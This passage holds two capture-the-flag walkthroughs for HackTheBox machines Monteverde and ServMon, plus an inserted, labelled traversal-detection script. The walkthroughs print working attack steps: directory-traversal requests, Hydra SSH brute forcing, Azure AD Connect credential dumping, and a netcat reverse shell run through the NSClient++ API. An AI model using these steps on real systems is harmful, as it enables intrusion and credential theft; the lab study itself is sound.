593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49703/tcp open  msrpc         Microsoft Windows RPC
49775/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=4/20%Time=5E9D283E%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -47m30s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-04-20T03:57:38
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1206.98 seconds

After enumeration, we have a couple of usernames:
MEGABANK\Administrator
MEGABANK\krbtgt
MEGABANK\AAD_987d7f2f57d2
MEGABANK\mhope
MEGABANK\SABatchJobs
MEGABANK\svc-ata
MEGABANK\svc-bexec
MEGABANK\svc-netapp
MEGABANK\dgalanos
MEGABANK\roleary
MEGABANK\smorgan

I tried several ways to log in, and I was able to access SMB as SABatchJobs with the password equal to the username.


┌─[✗]─[laladee@parrot]─[~/Downloads]
└──╼ $smbclient -U SABatchJobs -L \\10.10.10.172
Enter WORKGROUP\SABatchJobs's password: 

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
azure_uploads   Disk      
C$              Disk      Default share
E$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share 
SYSVOL          Disk      Logon server share 
users$          Disk      
SMB1 disabled -- no workgroup available

We can see that this user has access to the "users$" share.

┌─[✗]─[laladee@parrot]─[~/Downloads]
└──╼ $smbclient //10.10.10.172/users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Jan  3 13:12:48 2020
  ..                                  D        0  Fri Jan  3 13:12:48 2020
  dgalanos                            D        0  Fri Jan  3 13:12:30 2020
  mhope                               D        0  Fri Jan  3 13:41:18 2020
  roleary                             D        0  Fri Jan  3 13:10:30 2020
  smorgan                             D        0  Fri Jan  3 13:10:24 2020

524031 blocks of size 4096. 519955 blocks available
smb: \> cd dgalanos
smb: \dgalanos\> dir
  .                                   D        0  Fri Jan  3 13:12:30 2020
  ..                                  D        0  Fri Jan  3 13:12:30 2020
524031 blocks of size 4096. 519955 blocks available
smb: \dgalanos\> cd ..
smb: \> dir mhope
  mhope                               D        0  Fri Jan  3 13:41:18 2020
524031 blocks of size 4096. 519955 blocks available
smb: \> cd mhope
smb: \mhope\> dir
  .                                   D        0  Fri Jan  3 13:41:18 2020
  ..                                  D        0  Fri Jan  3 13:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 13:40:23 2020

524031 blocks of size 4096. 519955 blocks available
smb: \mhope\> type azure.xml
type: command not found
smb: \mhope\> more azure.xml
getting file \mhope\azure.xml of size 1212 as /tmp/smbmore.3eGmOU (1.0 KiloBytes/sec) (average 1.0 KiloBytes/sec)
"/tmp/smbmore.3eGmOU" may be a binary file.  See it anyway? 
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (1.1 KiloBytes/sec) (average 1.1 KiloBytes/sec)
smb: \mhope\> ^Z
[1]+  Stopped                 smbclient //10.10.10.172/users$ -U SABatchJobs


azure.xml:
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>

OK, now we have the password of user "mhope":

┌─[✗]─[laladee@parrot]─[~/Downloads]
└──╼ $evil-winrm -u mhope -p 4n0therD4y@n0th3r$ -i 10.10.10.172

Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> type ..\Desktop\user.txt
4961976bd7d8f4eeb2ce3705e2f212f2
*Evil-WinRM* PS C:\Users\mhope\Documents> 


GETTING ROOT
*Evil-WinRM* PS C:\Users\mhope\Documents> cd C:\
*Evil-WinRM* PS C:\> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins                       Group            S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448
*Evil-WinRM* PS C:\> 

After a few minutes of Googling MEGABANK\Azure Admins,
I found this technique (Azure AD Connect keeps the sync account's credentials in the ADSync database, where a member of that group can recover them): https://blog.xpnsec.com/azuread-connect-for-redteam/


┌─[laladee@parrot]─[~/Downloads]
└──╼ $wget https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1
┌─[laladee@parrot]─[~/Downloads]
└──╼ $python -m SimpleHTTPServer 1337
┌─[✗]─[laladee@parrot]─[~]
└──╼ $evil-winrm -u mhope -p 4n0therD4y@n0th3r$ -i 10.10.10.172

Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> Invoke-WebRequest "http://10.10.14.81:1337/Azure-ADConnect.ps1" -OutFile "C:\Users\mhope\Desktop\Azure_meo.ps1"
*Evil-WinRM* PS C:\Users\mhope\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> dir

    Directory: C:\Users\mhope\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/19/2020   9:46 PM           1454 AzureAD-Connect.ps1
-a----        4/19/2020  10:42 PM           2264 Azure_meo.ps1
-a----        4/19/2020   9:40 PM           1453 Connect.ps1
-ar---         1/3/2020   5:48 AM             32 user.txt

*Evil-WinRM* PS C:\Users\mhope\Desktop> import-module ./Azure_meo.ps1
*Evil-WinRM* PS C:\Users\mhope\Desktop> Azure_meo
The term 'Azure_meo' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ Azure_meo
+ ~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Azure_meo:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
    
*Evil-WinRM* PS C:\Users\mhope\Desktop> Azure-ADConnect -server 127.0.0.1 -db ADSync
[+] Domain:  MEGABANK.LOCAL
[+] Username: administrator
[+]Password: d0m@in4dminyeah!
*Evil-WinRM* PS C:\Users\mhope\Desktop> exit

┌─[laladee@parrot]─[~/Downloads]
└──╼ $evil-winrm -u Administrator -p d0m@in4dminyeah! -i 10.10.10.172

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
12909612d25c8dcf6e5a07d1a804a0bc
*Evil-WinRM* PS C:\Users\Administrator\Documents> 


Apr 19, 2020

HackTheBox Machine Write-up | ServMon Walkthrough


[ Laladee ~/Downloads ]# nmap -A 10.10.10.184 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-15 10:08 UTC
Nmap scan report for 10.10.10.184
Host is up (0.27s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp   open  http
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|     AuthInfo:
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|_    </html>
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  napster?
8443/tcp open  tcpwrapped
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m58s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-15T10:13:57
|_  start_date: N/A

TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   266.12 ms 10.10.14.1
2   476.44 ms 10.10.10.184

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 186.64 seconds

Log in to FTP as the anonymous user and download the Confidential.txt file:

ftp> cd Users
ftp> cd Nadine
ftp> get Confidential.txt

Visiting 10.10.10.184 shows an NVMS-1000 login page, so I searched for an NVMS-1000 exploit and found a directory traversal:
Link: https://www.exploit-db.com/exploits/47774

GET  /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: dataPort=6063
Upgrade-Insecure-Requests: 1
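A defender's counterpart to the traversal request above, added here and not part of the original write-up: the path check a static file server should apply before opening anything, plus a detection pass over access-log lines. WEB_ROOT and the sample log lines are constructed for the example.

```python
import posixpath
import re
from typing import List, Optional
from urllib.parse import unquote

# Assumed document root for this example; the real NVMS-1000 install path
# is not shown in the write-up, so this value is made up.
WEB_ROOT = "C:/NVMS-1000/www"

def normalise_request_path(request_path: str) -> str:
    """Decode percent-encoding (twice, to catch double encoding) and unify
    separators so %2e%2e%2f, ..\\ and ../ all look the same to the checks."""
    return unquote(unquote(request_path)).replace("\\", "/")

def is_traversal_attempt(request_path: str) -> bool:
    """True when any path component is '..': a static file server never
    needs to honour one, so its presence is the signal to reject and log."""
    return any(p == ".." for p in normalise_request_path(request_path).split("/"))

def resolve_static_path(request_path: str, web_root: str = WEB_ROOT) -> Optional[str]:
    """Map a URL path to a file under web_root, or None when it is rejected.
    The prefix check at the end is a second guard independent of the '..' test."""
    if is_traversal_attempt(request_path):
        return None
    rel = posixpath.normpath(normalise_request_path(request_path)).lstrip("/")
    candidate = posixpath.normpath(posixpath.join(web_root, rel))
    root = web_root.rstrip("/")
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate

# Extracts method and path from a common-log-format request field.
LOG_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

def flag_traversal_requests(log_lines: List[str]) -> List[str]:
    """Detection pass over access-log lines: return every request path that
    attempts traversal, so requests like the one above would surface here."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.search(line)
        if m and is_traversal_attempt(m.group("path")):
            hits.append(m.group("path"))
    return hits

# Constructed sample log lines (not captured traffic from the write-up).
SAMPLE_LOG = [
    '10.10.14.32 - - [15/Apr/2020:10:20:01 +0000] "GET /Pages/login.htm HTTP/1.1" 200 340',
    '10.10.14.32 - - [15/Apr/2020:10:20:05 +0000] "GET /../../../../windows/win.ini HTTP/1.1" 200 92',
    '10.10.14.32 - - [15/Apr/2020:10:20:09 +0000] "GET /%2e%2e/%2e%2e/Users/Nathan/Desktop/Passwords.txt HTTP/1.1" 200 155',
]
```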

Remember the contents of Confidential.txt:
“I left your Passwords.txt file on your Desktop”

GET  /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: dataPort=6063
Upgrade-Insecure-Requests: 1

The response contains a list of passwords:

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Save the passwords in a file named pass.txt and create one more file, users.txt, with the usernames nathan and nadine.

Now use Hydra to find working SSH credentials. Run the following command:
laladee@parrot:~# hydra -L users.txt -P pass.txt 10.10.10.184 ssh
[22][ssh] host: 10.10.10.184  login: nadine  password: L1k3B1gBut7s@W0rk

Login to SSH:
laladee@parrot:~# ssh nadine@10.10.10.184
nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.18363.752]         
© 2019 Microsoft Corporation. All rights reserved.
                                                 
nadine@SERVMON C:\Users\Nadine>
Now go to the Desktop and read the flag:
nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
GOT FLAG

Time to find the NSClient++ password. It is stored in the config file:
C:\"program files"\nsclient++\nsclient.ini
Found password: ew2x6SsGTxjRwXOT

According to this config, the web interface has to be called via 127.0.0.1.
Now check which port the NSClient++ service is listening on:
nadine@SERVMON C:\Program Files\NSClient++>netstat -a
You will find that it is listening on port 8443.
As we already saw in the Nmap results, port 8443 serves a web page over SSL with a certificate issued for localhost.

Create a meo.bat file with the following contents:
@echo off
C:\Temp\nc.exe 10.10.14.32 4444 -e cmd.exe

Start SimpleHTTPServer:
laladee@parrot:~# python -m SimpleHTTPServer 1337
Serving HTTP on 0.0.0.0 port 1337 ...

Download nc.exe and meo.bat onto the target:
nadine@SERVMON C:\>powershell.exe wget "http://10.10.14.32:1337/nc.exe" -outfile "c:\Temp\nc.exe"
nadine@SERVMON C:\>powershell.exe wget "http://10.10.14.32:1337/meo.bat" -outfile "c:\Temp\meo.bat"

Go back to the terminal and start the listener:
laladee@parrot:~# nc -lvnp 4444
listening on [any] 4444 ...

After reading the NSClient++ API documentation and picking up some hints, we can add and execute our bat file with the following commands:

nadine@SERVMON C:\>cd temp
nadine@SERVMON C:\Temp>curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/meo.bat --data-binary "C:\Temp\nc.exe 10.10.14.32 4444 -e cmd.exe"
nadine@SERVMON C:\Temp>curl -s -k -u admin https://127.0.0.1:8443/api/v1/queries/
Type the admin password we found when prompted:
ew2x6SsGTxjRwXOT

Now check your listener:
C:\Program Files\NSClient++>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>type root.txt
